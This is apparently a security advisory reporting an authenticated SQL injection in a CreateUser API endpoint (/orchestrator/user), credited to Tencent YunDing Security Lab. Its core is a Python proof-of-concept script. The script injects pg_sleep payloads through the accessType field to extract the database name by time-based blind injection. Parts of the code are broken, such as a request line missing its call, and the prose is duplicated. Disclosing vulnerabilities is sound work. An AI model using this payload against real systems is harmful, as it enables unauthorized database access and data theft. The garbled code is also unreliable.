An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).
The API is CreateUser (/orchestrator/user).
The function to read user input is:
The userInfo (line 104) parameter can be controlled by users.
The SQL injection can happen in the code:
The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.
The user should be authenticated but only needs minimum permissions:

Demonstrate a blind SQL injection to retrieve the database name:
import requests
import time
import string
import argparse
def blind(ip, token, query):
url = f"http://{ip}/orchestrator/user"
headers = {"token": token}
entity = "chart-group"
payload = f"'; {query} --"
data = {"id": 111, "email_id": "[email protected]", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
start = time.time()
res =, headers=headers, json = data)
end = time.time()
if(end - start > 1):
return True
return False
def main(ip, token):
chs = string.printable
result = ""
is_end = False
i = 1
while(not is_end):
is_end = True
for ch in chs:
if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
result += ch
is_end = False
i += 1
if __name__ == "__main__":
argparser = argparse.ArgumentParser()
argparser.add_argument("--ip", "-i", type=str, help="Target IP")
argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
args = argparser.parse_args()
main(args.ip, args.token)
The debugging breakpoint indicated that the malicious SQL query was executed:

We can see that we can get the database name:

SQL injection vulnerability. Our tests indicate that the latest version is affected.
The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.
An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).
The API is CreateUser (/orchestrator/user).
The function to read user input is:
The userInfo (line 104) parameter can be controlled by users.
The SQL injection can happen in the code:
The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.
The user should be authenticated but only needs minimum permissions:

Demonstrate a blind SQL injection to retrieve the database name:
The debugging breakpoint indicated that the malicious SQL query was executed:

We can see that we can get the database name:

SQL injection vulnerability. Our tests indicate that the latest version is affected.
The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.